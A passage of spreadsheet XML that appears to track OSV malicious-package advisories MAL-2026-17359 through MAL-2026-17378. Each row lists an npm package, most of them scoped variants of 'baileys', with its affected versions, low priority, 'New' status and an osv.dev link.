      <c r="J684" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K684" s="5" t="inlineStr"/>
      <c r="L684" s="5" t="inlineStr">
        <is>
          <t>npm:@japofc/baileys</t>
        </is>
      </c>
      <c r="M684" s="5" t="inlineStr"/>
      <c r="N684" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O684" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P684" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q684" s="5" t="inlineStr"/>
      <c r="R684" s="5" t="inlineStr"/>
      <c r="S68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@japofc/baileys (npm), version(s): 2.4.3, 2.4.2, 2.4.1, 2.4.0, 2.3.0, 2.2.0, 2.1.0.</t>
        </is>
      </c>
      <c r="T684" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17359</t>
        </is>
      </c>
    </row>
    <row r="685">
      <c r="A685" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B685" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C685" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17360</t>
        </is>
      </c>
      <c r="D685" s="5" t="inlineStr"/>
      <c r="E685" s="5" t="inlineStr"/>
      <c r="F685" s="5" t="inlineStr"/>
      <c r="G685" s="5" t="inlineStr"/>
      <c r="H685" s="5" t="inlineStr"/>
      <c r="I685" s="5" t="inlineStr"/>
      <c r="J685" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K685" s="5" t="inlineStr"/>
      <c r="L685" s="5" t="inlineStr">
        <is>
          <t>npm:@jojoxyz/condemnedforce-baileys</t>
        </is>
      </c>
      <c r="M685" s="5" t="inlineStr"/>
      <c r="N685" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O685" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P685" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q685" s="5" t="inlineStr"/>
      <c r="R685" s="5" t="inlineStr"/>
      <c r="S68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@jojoxyz/condemnedforce-baileys (npm), version(s): 2.3.0.</t>
        </is>
      </c>
      <c r="T685" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17360</t>
        </is>
      </c>
    </row>
    <row r="686">
      <c r="A686" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B686" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C686" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17361</t>
        </is>
      </c>
      <c r="D686" s="5" t="inlineStr"/>
      <c r="E686" s="5" t="inlineStr"/>
      <c r="F686" s="5" t="inlineStr"/>
      <c r="G686" s="5" t="inlineStr"/>
      <c r="H686" s="5" t="inlineStr"/>
      <c r="I686" s="5" t="inlineStr"/>
      <c r="J686" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K686" s="5" t="inlineStr"/>
      <c r="L686" s="5" t="inlineStr">
        <is>
          <t>npm:@kanaraa/baileys</t>
        </is>
      </c>
      <c r="M686" s="5" t="inlineStr"/>
      <c r="N686" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O686" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P686" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q686" s="5" t="inlineStr"/>
      <c r="R686" s="5" t="inlineStr"/>
      <c r="S68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@kanaraa/baileys (npm), version(s): 3.5.2, 3.5.1, 3.4.7, 3.4.6, 3.4.5, 3.4.4, 3.4.2, 3.5.0, 3.4.1, 3.4.0, 3.3.0, 3.2.0, 3.1.9, 3.1.8.</t>
        </is>
      </c>
      <c r="T686" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17361</t>
        </is>
      </c>
    </row>
    <row r="687">
      <c r="A687" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B687" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C687" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17362</t>
        </is>
      </c>
      <c r="D687" s="5" t="inlineStr"/>
      <c r="E687" s="5" t="inlineStr"/>
      <c r="F687" s="5" t="inlineStr"/>
      <c r="G687" s="5" t="inlineStr"/>
      <c r="H687" s="5" t="inlineStr"/>
      <c r="I687" s="5" t="inlineStr"/>
      <c r="J687" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K687" s="5" t="inlineStr"/>
      <c r="L687" s="5" t="inlineStr">
        <is>
          <t>npm:@kelvdra/baileys</t>
        </is>
      </c>
      <c r="M687" s="5" t="inlineStr"/>
      <c r="N687" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O687" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P687" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q687" s="5" t="inlineStr"/>
      <c r="R687" s="5" t="inlineStr"/>
      <c r="S68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@kelvdra/baileys (npm), version(s): 1.0.6-rc.1, 1.0.6, 1.0.5-rc.3.</t>
        </is>
      </c>
      <c r="T687" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17362</t>
        </is>
      </c>
    </row>
    <row r="688">
      <c r="A688" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B688" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C688" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17363</t>
        </is>
      </c>
      <c r="D688" s="5" t="inlineStr"/>
      <c r="E688" s="5" t="inlineStr"/>
      <c r="F688" s="5" t="inlineStr"/>
      <c r="G688" s="5" t="inlineStr"/>
      <c r="H688" s="5" t="inlineStr"/>
      <c r="I688" s="5" t="inlineStr"/>
      <c r="J688" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K688" s="5" t="inlineStr"/>
      <c r="L688" s="5" t="inlineStr">
        <is>
          <t>npm:@kxa/xbails</t>
        </is>
      </c>
      <c r="M688" s="5" t="inlineStr"/>
      <c r="N688" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O688" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P688" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q688" s="5" t="inlineStr"/>
      <c r="R688" s="5" t="inlineStr"/>
      <c r="S68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@kxa/xbails (npm), version(s): 0.0.5.</t>
        </is>
      </c>
      <c r="T688" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17363</t>
        </is>
      </c>
    </row>
    <row r="689">
      <c r="A689" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B689" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C689" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17364</t>
        </is>
      </c>
      <c r="D689" s="5" t="inlineStr"/>
      <c r="E689" s="5" t="inlineStr"/>
      <c r="F689" s="5" t="inlineStr"/>
      <c r="G689" s="5" t="inlineStr"/>
      <c r="H689" s="5" t="inlineStr"/>
      <c r="I689" s="5" t="inlineStr"/>
      <c r="J689" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K689" s="5" t="inlineStr"/>
      <c r="L689" s="5" t="inlineStr">
        <is>
          <t>npm:@lendkzn/xntaabail</t>
        </is>
      </c>
      <c r="M689" s="5" t="inlineStr"/>
      <c r="N689" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O689" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P689" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q689" s="5" t="inlineStr"/>
      <c r="R689" s="5" t="inlineStr"/>
      <c r="S68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@lendkzn/xntaabail (npm), version(s): 7.0.0.</t>
        </is>
      </c>
      <c r="T689" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17364</t>
        </is>
      </c>
    </row>
    <row r="690">
      <c r="A690" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B690" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C690" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17365</t>
        </is>
      </c>
      <c r="D690" s="5" t="inlineStr"/>
      <c r="E690" s="5" t="inlineStr"/>
      <c r="F690" s="5" t="inlineStr"/>
      <c r="G690" s="5" t="inlineStr"/>
      <c r="H690" s="5" t="inlineStr"/>
      <c r="I690" s="5" t="inlineStr"/>
      <c r="J690" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K690" s="5" t="inlineStr"/>
      <c r="L690" s="5" t="inlineStr">
        <is>
          <t>npm:@lendxntaa/baileys</t>
        </is>
      </c>
      <c r="M690" s="5" t="inlineStr"/>
      <c r="N690" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O690" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P690" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q690" s="5" t="inlineStr"/>
      <c r="R690" s="5" t="inlineStr"/>
      <c r="S69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@lendxntaa/baileys (npm), version(s): 9.5.0, 9.3.0, 9.1.0, 9.0.2, 9.0.1.</t>
        </is>
      </c>
      <c r="T690" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17365</t>
        </is>
      </c>
    </row>
    <row r="691">
      <c r="A691" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B691" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C691" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17366</t>
        </is>
      </c>
      <c r="D691" s="5" t="inlineStr"/>
      <c r="E691" s="5" t="inlineStr"/>
      <c r="F691" s="5" t="inlineStr"/>
      <c r="G691" s="5" t="inlineStr"/>
      <c r="H691" s="5" t="inlineStr"/>
      <c r="I691" s="5" t="inlineStr"/>
      <c r="J691" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K691" s="5" t="inlineStr"/>
      <c r="L691" s="5" t="inlineStr">
        <is>
          <t>npm:@levvicode/baileys</t>
        </is>
      </c>
      <c r="M691" s="5" t="inlineStr"/>
      <c r="N691" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O691" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P691" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q691" s="5" t="inlineStr"/>
      <c r="R691" s="5" t="inlineStr"/>
      <c r="S69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@levvicode/baileys (npm), version(s): 0.0.3, 0.0.2.</t>
        </is>
      </c>
      <c r="T691" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17366</t>
        </is>
      </c>
    </row>
    <row r="692">
      <c r="A692" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B692" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C692" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17367</t>
        </is>
      </c>
      <c r="D692" s="5" t="inlineStr"/>
      <c r="E692" s="5" t="inlineStr"/>
      <c r="F692" s="5" t="inlineStr"/>
      <c r="G692" s="5" t="inlineStr"/>
      <c r="H692" s="5" t="inlineStr"/>
      <c r="I692" s="5" t="inlineStr"/>
      <c r="J692" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K692" s="5" t="inlineStr"/>
      <c r="L692" s="5" t="inlineStr">
        <is>
          <t>npm:@mikudeveloper/grace</t>
        </is>
      </c>
      <c r="M692" s="5" t="inlineStr"/>
      <c r="N692" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O692" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P692" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q692" s="5" t="inlineStr"/>
      <c r="R692" s="5" t="inlineStr"/>
      <c r="S69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@mikudeveloper/grace (npm), version(s): 2.0.1, 1.0.21, 1.0.20.</t>
        </is>
      </c>
      <c r="T692" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17367</t>
        </is>
      </c>
    </row>
    <row r="693">
      <c r="A693" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B693" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C693" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17368</t>
        </is>
      </c>
      <c r="D693" s="5" t="inlineStr"/>
      <c r="E693" s="5" t="inlineStr"/>
      <c r="F693" s="5" t="inlineStr"/>
      <c r="G693" s="5" t="inlineStr"/>
      <c r="H693" s="5" t="inlineStr"/>
      <c r="I693" s="5" t="inlineStr"/>
      <c r="J693" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K693" s="5" t="inlineStr"/>
      <c r="L693" s="5" t="inlineStr">
        <is>
          <t>npm:@mivesensei/baileys</t>
        </is>
      </c>
      <c r="M693" s="5" t="inlineStr"/>
      <c r="N693" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O693" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P693" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q693" s="5" t="inlineStr"/>
      <c r="R693" s="5" t="inlineStr"/>
      <c r="S69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@mivesensei/baileys (npm), version(s): 0.4.2.</t>
        </is>
      </c>
      <c r="T693" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17368</t>
        </is>
      </c>
    </row>
    <row r="694">
      <c r="A694" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B694" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C694" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17369</t>
        </is>
      </c>
      <c r="D694" s="5" t="inlineStr"/>
      <c r="E694" s="5" t="inlineStr"/>
      <c r="F694" s="5" t="inlineStr"/>
      <c r="G694" s="5" t="inlineStr"/>
      <c r="H694" s="5" t="inlineStr"/>
      <c r="I694" s="5" t="inlineStr"/>
      <c r="J694" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K694" s="5" t="inlineStr"/>
      <c r="L694" s="5" t="inlineStr">
        <is>
          <t>npm:@noxleyss/baileys</t>
        </is>
      </c>
      <c r="M694" s="5" t="inlineStr"/>
      <c r="N694" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O694" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P694" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q694" s="5" t="inlineStr"/>
      <c r="R694" s="5" t="inlineStr"/>
      <c r="S69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@noxleyss/baileys (npm), version(s): 1.1.10.</t>
        </is>
      </c>
      <c r="T694" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17369</t>
        </is>
      </c>
    </row>
    <row r="695">
      <c r="A695" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B695" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C695" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17370</t>
        </is>
      </c>
      <c r="D695" s="5" t="inlineStr"/>
      <c r="E695" s="5" t="inlineStr"/>
      <c r="F695" s="5" t="inlineStr"/>
      <c r="G695" s="5" t="inlineStr"/>
      <c r="H695" s="5" t="inlineStr"/>
      <c r="I695" s="5" t="inlineStr"/>
      <c r="J695" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K695" s="5" t="inlineStr"/>
      <c r="L695" s="5" t="inlineStr">
        <is>
          <t>npm:@nyzzpedia/baileys-new</t>
        </is>
      </c>
      <c r="M695" s="5" t="inlineStr"/>
      <c r="N695" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O695" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P695" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q695" s="5" t="inlineStr"/>
      <c r="R695" s="5" t="inlineStr"/>
      <c r="S69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@nyzzpedia/baileys-new (npm), version(s): 1.0.0.</t>
        </is>
      </c>
      <c r="T695" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17370</t>
        </is>
      </c>
    </row>
    <row r="696">
      <c r="A696" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B696" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C696" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17371</t>
        </is>
      </c>
      <c r="D696" s="5" t="inlineStr"/>
      <c r="E696" s="5" t="inlineStr"/>
      <c r="F696" s="5" t="inlineStr"/>
      <c r="G696" s="5" t="inlineStr"/>
      <c r="H696" s="5" t="inlineStr"/>
      <c r="I696" s="5" t="inlineStr"/>
      <c r="J696" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K696" s="5" t="inlineStr"/>
      <c r="L696" s="5" t="inlineStr">
        <is>
          <t>npm:@nyzzpediaa/baileys-new</t>
        </is>
      </c>
      <c r="M696" s="5" t="inlineStr"/>
      <c r="N696" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O696" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P696" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q696" s="5" t="inlineStr"/>
      <c r="R696" s="5" t="inlineStr"/>
      <c r="S69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@nyzzpediaa/baileys-new (npm), version(s): 1.0.12, 1.0.11, 1.0.10, 1.0.9, 1.0.8, 1.0.7, 1.0.6, 1.0.5, 1.0.4, 1.0.3, 1.0.2, 1.0.0.</t>
        </is>
      </c>
      <c r="T696" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17371</t>
        </is>
      </c>
    </row>
    <row r="697">
      <c r="A697" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B697" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C697" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17372</t>
        </is>
      </c>
      <c r="D697" s="5" t="inlineStr"/>
      <c r="E697" s="5" t="inlineStr"/>
      <c r="F697" s="5" t="inlineStr"/>
      <c r="G697" s="5" t="inlineStr"/>
      <c r="H697" s="5" t="inlineStr"/>
      <c r="I697" s="5" t="inlineStr"/>
      <c r="J697" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K697" s="5" t="inlineStr"/>
      <c r="L697" s="5" t="inlineStr">
        <is>
          <t>npm:@ostyado/baileys</t>
        </is>
      </c>
      <c r="M697" s="5" t="inlineStr"/>
      <c r="N697" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O697" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P697" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q697" s="5" t="inlineStr"/>
      <c r="R697" s="5" t="inlineStr"/>
      <c r="S69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@ostyado/baileys (npm), version(s): 2.0.9, 2.0.8, 2.0.7, 2.0.6.</t>
        </is>
      </c>
      <c r="T697" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17372</t>
        </is>
      </c>
    </row>
    <row r="698">
      <c r="A698" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B698" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C698" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17373</t>
        </is>
      </c>
      <c r="D698" s="5" t="inlineStr"/>
      <c r="E698" s="5" t="inlineStr"/>
      <c r="F698" s="5" t="inlineStr"/>
      <c r="G698" s="5" t="inlineStr"/>
      <c r="H698" s="5" t="inlineStr"/>
      <c r="I698" s="5" t="inlineStr"/>
      <c r="J698" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K698" s="5" t="inlineStr"/>
      <c r="L698" s="5" t="inlineStr">
        <is>
          <t>npm:@queenanya/baileys</t>
        </is>
      </c>
      <c r="M698" s="5" t="inlineStr"/>
      <c r="N698" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O698" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P698" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q698" s="5" t="inlineStr"/>
      <c r="R698" s="5" t="inlineStr"/>
      <c r="S69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@queenanya/baileys (npm), version(s): 9.10.1, 9.7.3-beta.1, 9.7.2.</t>
        </is>
      </c>
      <c r="T698" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17373</t>
        </is>
      </c>
    </row>
    <row r="699">
      <c r="A699" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B699" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C699" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17374</t>
        </is>
      </c>
      <c r="D699" s="5" t="inlineStr"/>
      <c r="E699" s="5" t="inlineStr"/>
      <c r="F699" s="5" t="inlineStr"/>
      <c r="G699" s="5" t="inlineStr"/>
      <c r="H699" s="5" t="inlineStr"/>
      <c r="I699" s="5" t="inlineStr"/>
      <c r="J699" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K699" s="5" t="inlineStr"/>
      <c r="L699" s="5" t="inlineStr">
        <is>
          <t>npm:@rennnpm/baileys</t>
        </is>
      </c>
      <c r="M699" s="5" t="inlineStr"/>
      <c r="N699" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O699" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P699" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q699" s="5" t="inlineStr"/>
      <c r="R699" s="5" t="inlineStr"/>
      <c r="S69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@rennnpm/baileys (npm), version(s): 1.0.0.</t>
        </is>
      </c>
      <c r="T699" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17374</t>
        </is>
      </c>
    </row>
    <row r="700">
      <c r="A700" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B700" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C700" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17375</t>
        </is>
      </c>
      <c r="D700" s="5" t="inlineStr"/>
      <c r="E700" s="5" t="inlineStr"/>
      <c r="F700" s="5" t="inlineStr"/>
      <c r="G700" s="5" t="inlineStr"/>
      <c r="H700" s="5" t="inlineStr"/>
      <c r="I700" s="5" t="inlineStr"/>
      <c r="J700" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K700" s="5" t="inlineStr"/>
      <c r="L700" s="5" t="inlineStr">
        <is>
          <t>npm:@revizahoshii/baileys</t>
        </is>
      </c>
      <c r="M700" s="5" t="inlineStr"/>
      <c r="N700" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O700" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P700" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q700" s="5" t="inlineStr"/>
      <c r="R700" s="5" t="inlineStr"/>
      <c r="S70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@revizahoshii/baileys (npm), version(s): 0.5.4, 0.5.3, 0.5.2, 0.5.1, 0.5.0, 0.4.2, 0.4.1, 0.4.0, 0.3.18.</t>
        </is>
      </c>
      <c r="T700" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17375</t>
        </is>
      </c>
    </row>
    <row r="701">
      <c r="A701" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B701" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C701" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17376</t>
        </is>
      </c>
      <c r="D701" s="5" t="inlineStr"/>
      <c r="E701" s="5" t="inlineStr"/>
      <c r="F701" s="5" t="inlineStr"/>
      <c r="G701" s="5" t="inlineStr"/>
      <c r="H701" s="5" t="inlineStr"/>
      <c r="I701" s="5" t="inlineStr"/>
      <c r="J701" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K701" s="5" t="inlineStr"/>
      <c r="L701" s="5" t="inlineStr">
        <is>
          <t>npm:@revizahoshii/hoshino</t>
        </is>
      </c>
      <c r="M701" s="5" t="inlineStr"/>
      <c r="N701" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O701" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P701" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q701" s="5" t="inlineStr"/>
      <c r="R701" s="5" t="inlineStr"/>
      <c r="S70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@revizahoshii/hoshino (npm), version(s): 1.1.0.</t>
        </is>
      </c>
      <c r="T701" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17376</t>
        </is>
      </c>
    </row>
    <row r="702">
      <c r="A702" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B702" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C702" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17377</t>
        </is>
      </c>
      <c r="D702" s="5" t="inlineStr"/>
      <c r="E702" s="5" t="inlineStr"/>
      <c r="F702" s="5" t="inlineStr"/>
      <c r="G702" s="5" t="inlineStr"/>
      <c r="H702" s="5" t="inlineStr"/>
      <c r="I702" s="5" t="inlineStr"/>
      <c r="J702" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K702" s="5" t="inlineStr"/>
      <c r="L702" s="5" t="inlineStr">
        <is>
          <t>npm:@saazkira/baileys</t>
        </is>
      </c>
      <c r="M702" s="5" t="inlineStr"/>
      <c r="N702" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O702" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P702" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q702" s="5" t="inlineStr"/>
      <c r="R702" s="5" t="inlineStr"/>
      <c r="S70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@saazkira/baileys (npm), version(s): 2.1.9, 2.1.8, 2.1.7, 2.1.6.</t>
        </is>
      </c>
      <c r="T702" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17377</t>
        </is>
      </c>
    </row>
    <row r="703">
      <c r="A703" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B703" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C703" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17378</t>
        </is>
      </c>
      <c r="D703" s="5" t="inlineStr"/>
      <c r="E703" s="5" t="inlineStr"/>
      <c r="F703" s="5" t="inlineStr"/>
      <c r="G703" s="5" t="inlineStr"/>
      <c r="H703" s="5" t="inlineStr"/>
      <c r="I703" s="5" t="inlineStr"/>
      <c r="J703" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K703" s="5" t="inlineStr"/>
      <c r="L703" s="5" t="inlineStr">
        <is>
